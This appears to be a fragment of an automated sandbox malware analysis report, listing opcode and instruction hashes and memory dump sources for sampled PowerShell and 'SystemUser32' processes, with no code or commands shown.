                                                • Instruction ID: 5b372c1e1672f6216413306b9256e454936bf8699fc1b834560712159e7bdb6d
                                                • Opcode Fuzzy Hash: 4b0413d2f8e0225256751b12c26558243ff32d7e297d88da2e914bd0b8d2ce35
                                                • Instruction Fuzzy Hash: 0141127140EBC48FE3568B2898459523FF0EF57320B1542DFE088CB1A3D629EC4AC7A2
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1781498142.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffaaccd0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d83c79a5356ff805797d8e6427281c83b6f1c223c99a07c156449933e1cf0ee
                                                • Instruction ID: e146458ad780eb78a53004386e33bb1dfe5590ab215ad11203d07799eb75026c
                                                • Opcode Fuzzy Hash: 5d83c79a5356ff805797d8e6427281c83b6f1c223c99a07c156449933e1cf0ee
                                                • Instruction Fuzzy Hash: EE314B7190DB8C8FEB59DF6898497E97FE0EF56321F04816FC048C7152DA64981ACB91
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1781498142.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffaaccd0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                • Instruction ID: c5fe5ef16c9603e2c38b2b8f18b6b479cf07841371c6c5dc00f7d796ae02029c
                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                • Instruction Fuzzy Hash: BB01847010CB088FD744EF0CE051AA5B3E0FB89320F10052EE58AC3661DA22E882CB41
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1781498142.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffaaccd0000_powershell.jbxd
                                                Similarity
                                                • Instruction ID: e8fbc3c440a7817ae5236833bc055a0e283a0b79aaf959c8df825a0df5b3507b
                                                • Opcode Fuzzy Hash: 9ed9da70320f4f48ced678da58727c5ecc33bb10061f32eb3c5244bf338a4dfc
                                                • Instruction Fuzzy Hash: 202194A191CB8A8FE745DBA888651F9BFF1FF5A200F4540AAD04ED75D3DD14A8058381
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2021448153.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_7ffaaccb0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d30c88584d9a3aafdd5383b0a55d00e34ecacc66816f04b8409e485b50864b1c
                                                • Instruction ID: a6851801ab438671d64f100696c0aa63a1d69185020d31dd5b75af02b61644bf
                                                • Opcode Fuzzy Hash: d30c88584d9a3aafdd5383b0a55d00e34ecacc66816f04b8409e485b50864b1c
                                                • Instruction Fuzzy Hash: 5A7155A1A19A595FEB98BB79D4597FD76A2FF8D310B4044BDE00EC32D3DE289805C780
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2021448153.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_7ffaaccb0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 57d47bc8baa7ffa678cfa00188abf07216feeec6ebd7ad199e8d4ddc775d1337
                                                • Instruction ID: 3f0e700405fec8ad814a05a8da73197782dace4a61152fba88cf4245b3141031
                                                • Opcode Fuzzy Hash: 57d47bc8baa7ffa678cfa00188abf07216feeec6ebd7ad199e8d4ddc775d1337
                                                • Instruction Fuzzy Hash: A1514862A0E7864FE356A77CD8555B53BE5EF87220B0940FBD48CC7193DD18AC4A8392
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2021448153.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_7ffaaccb0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 930104aeee2e90302f117e75db562f98b3ede2c712c094d8b836de31c90bb338
                                                • Instruction ID: 2a7471683a7205d280a72dca8e35969cc3aa5e68de6996480a145e9a94ec9976
                                                • Opcode Fuzzy Hash: 930104aeee2e90302f117e75db562f98b3ede2c712c094d8b836de31c90bb338
                                                • Instruction Fuzzy Hash: 4631B362B189490FE788BB7DD46A679B6C6EF99215F0405FAE00EC3293DD689C428380
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2021448153.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_7ffaaccb0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 947aa5f6805eed594154f49fd7b83f760015c9ce8fcf6c9eafa5cf6f68645b98
                                                • Instruction ID: a70195f14a2f0a7b743e94a01f7a7b53c2a84e3c9b530a7e3f1f0801fb50d7e5
                                                • Opcode Fuzzy Hash: 947aa5f6805eed594154f49fd7b83f760015c9ce8fcf6c9eafa5cf6f68645b98
                                                • Instruction Fuzzy Hash: 2231D2A2B19A095BF744BBB9881E7BD77D5EF99211F0442B6E00DC3293DE28D8058391
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2021448153.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_7ffaaccb0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 533c068d7b68c6aa7d4fec5cbc7d83243876141879935afc6f40f9f309b626e0
                                                • Instruction ID: 52efb92dc8a01c418da27403cb725ae4516e3213866482f81141fcb330265976
                                                • Opcode Fuzzy Hash: 533c068d7b68c6aa7d4fec5cbc7d83243876141879935afc6f40f9f309b626e0
                                                • Instruction Fuzzy Hash: B23180B1A18A0A8FEB44EBB8C4556F9B7A1FF9D301F5045B9D00DC7293CE38A8458781
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2021448153.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_7ffaaccb0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0fef386e1108e7c1cee8d8afb2d4ed4f9f41668fb17859432eed4439f752884c
                                                • Instruction ID: 73c985d4bf117424f7d8fdd36839b0d7043245ec02fc5d9a01419b7c4e804476
                                                • Opcode Fuzzy Hash: 0fef386e1108e7c1cee8d8afb2d4ed4f9f41668fb17859432eed4439f752884c
                                                • Instruction Fuzzy Hash: D7218FE56AC6094FD341EB3CD05AAF9BF71AF8E215B8045E9D00DC7397DE28A9008792
                                                Memory Dump Source
                                                • Source File: 0000001A.00000002.2021448153.00007FFAACCB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_26_2_7ffaaccb0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 13822983a0b0fbdf951333f8a87c1aab4b8d25416cb4a922e39173bbe5aeba37
                                                • Instruction ID: 436197c508b3a4dc8b23335a719f55bbd31c3e4c7b658ca57e41f167187af6fa
                                                • Opcode Fuzzy Hash: 13822983a0b0fbdf951333f8a87c1aab4b8d25416cb4a922e39173bbe5aeba37
                                                • Instruction Fuzzy Hash: 9301F255C0E7C48EF752AB795859572BFE0DF9B210B0844AEF48DC6093D908A9488382
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2042632138.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d956196a562666521381493b4619a1f51d8c2bf905e247d8d0e832c24a84e8a0
                                                • Instruction ID: 548b9b6ccced77c6d58369fa4e5f49a0089f5248b7be1acb3919598b5c36217d
                                                • Opcode Fuzzy Hash: d956196a562666521381493b4619a1f51d8c2bf905e247d8d0e832c24a84e8a0
                                                • Instruction Fuzzy Hash: 78512451A1E6C94FE787AB7898686757FD5DF87225B1804FBE0CDC7193DE184806C382
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2042632138.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c237e9f1c4f37bef4845522059a2e9a8daca1c9a49ee8b21f4dedf7042b88f4f
                                                • Instruction ID: ba24320ff50d00b72e6c6e0cc9764bef1470c29ee0ea7eb78d0418b6d42d5e49
                                                • Opcode Fuzzy Hash: c237e9f1c4f37bef4845522059a2e9a8daca1c9a49ee8b21f4dedf7042b88f4f
                                                • Instruction Fuzzy Hash: 7731F8A2D1D78A4FE742EB6C98652FD7FB0EF96211F4441BBC08DC7193DE1898098391
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2042632138.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf894c5b51b7b3bf929b896de89f5cc71c89c9b3ce7e57a7fb20c71f8bdfdbb2
                                                • Instruction ID: 44ec7062a7f84aa2bfa469b86ef2692d0a0f327e8186673743f928a93486aafb
                                                • Opcode Fuzzy Hash: bf894c5b51b7b3bf929b896de89f5cc71c89c9b3ce7e57a7fb20c71f8bdfdbb2
                                                • Instruction Fuzzy Hash: 6A21B7A191D78A4FEB46DB6888652FD7FB1FF9A200F4540ABD04ED31D3DD189805C391
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2042632138.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd709e4775f28b1dc4f9307ddd3e7afa3fcb9c41e0ca794868309312d7e13310
                                                • Instruction ID: 81066b538b9b7ef5d36f5e0b8e703d1aed30cf3471c7dbd596d147a6083550ef
                                                • Opcode Fuzzy Hash: dd709e4775f28b1dc4f9307ddd3e7afa3fcb9c41e0ca794868309312d7e13310
                                                • Instruction Fuzzy Hash: 7971A461B29A495FEB99BB78D45D7BD7692FF89311F8044B9E40EC32D3DE289810C780
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2042632138.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a11546bfe6ea0a5a3ef69d74ffd467b1f81b8f223c46d6255fa3661a295a0c49
                                                • Instruction ID: c302241201de1359a47cbac648adc5f9940cb5da623b1a3854ac33927c93f184
                                                • Opcode Fuzzy Hash: a11546bfe6ea0a5a3ef69d74ffd467b1f81b8f223c46d6255fa3661a295a0c49
                                                • Instruction Fuzzy Hash: 10512862A0E6864FE357A73CD8656B57BD5EF87210B0940FBD48CC7193DD189C468392
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2042632138.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 57d9bdee97bfcccc7d250379d99c5aed6b84cef17d6648aaf983cb387e262882
                                                • Instruction ID: 48d1acf9feb982f27b58d0d5adf7bc7a8a0f4ece4d648965c1229ad04bf53993
                                                • Opcode Fuzzy Hash: 57d9bdee97bfcccc7d250379d99c5aed6b84cef17d6648aaf983cb387e262882
                                                • Instruction Fuzzy Hash: 3831B562B189490FE688BB6CD45A779B6C6EF99215F0405FEE00EC3293DE649C418380
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2042632138.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a95b791de0fdc94f1255f8e7fef2cb87faa55f7050a59e534593944493d7158a
                                                • Instruction ID: 572143fa01fdec74f02e4d1c5c8932cc637afeeca924a08e1d1c35b5a61b4714
                                                • Opcode Fuzzy Hash: a95b791de0fdc94f1255f8e7fef2cb87faa55f7050a59e534593944493d7158a
                                                • Instruction Fuzzy Hash: E731E3A2B19A095FF745BBBC885E7BD77D5EF99211F0442BBE00DC3292DE2898018391
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2042632138.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4944d6770d918f517177c6ebfbb2bfa3817163b5a77bf4bcaab5bde49a980e87
                                                • Instruction ID: 39a873db6259c95c3ba6fd8c28b9beaac0dad002e06d26bf096c14cec906ebdc
                                                • Opcode Fuzzy Hash: 4944d6770d918f517177c6ebfbb2bfa3817163b5a77bf4bcaab5bde49a980e87
                                                • Instruction Fuzzy Hash: A331A3B1A18A0D8FEB45EB78D459BEDB7A2FF99301F5045B9D00DC3292CE38A805C781
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2042632138.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a461d79d3f66617bf6682fefa10eb01018d3a148b7e8a3962b4ec7609570742d
                                                • Instruction ID: d5f624b339635a0e9a853ed7558902e54789161f3e058316487e21304553a7d3
                                                • Opcode Fuzzy Hash: a461d79d3f66617bf6682fefa10eb01018d3a148b7e8a3962b4ec7609570742d
                                                • Instruction Fuzzy Hash: 852180E56586494FD741EB28D499EE9FF62EF8D311F8044E9D40DC3397DE289900CB92
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2042632138.00007FFAACCD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCD0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_7ffaaccd0000_SystemUser32.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bdcd3173f1b4432e7ab26813dc1f05173035a156c0fcc3776ca43e88c105a6e9
                                                • Instruction ID: 454e29b7ca1ea778d21a594d446509909e48b8dee757879b5a9804b435a2153c
                                                • Opcode Fuzzy Hash: bdcd3173f1b4432e7ab26813dc1f05173035a156c0fcc3776ca43e88c105a6e9
                                                • Instruction Fuzzy Hash: E201F29580E7858FF752AB385859662BFE1DF96220F0804ABE48CC6493E918A95883C2